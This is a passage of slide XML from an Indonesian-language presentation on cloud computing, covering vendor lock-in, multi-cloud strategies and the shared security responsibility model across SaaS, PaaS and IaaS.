              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PII) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penguncian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hati-hati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>portabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>interoperabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standarisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguncian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor. Strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud multi-cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hybrid cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6025263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Matriks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Jawab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Saat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasarinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud (CSP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SaaS, PaaS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IaaS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model SaaS, CSP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penawaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CSP dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model IaaS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Matriks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
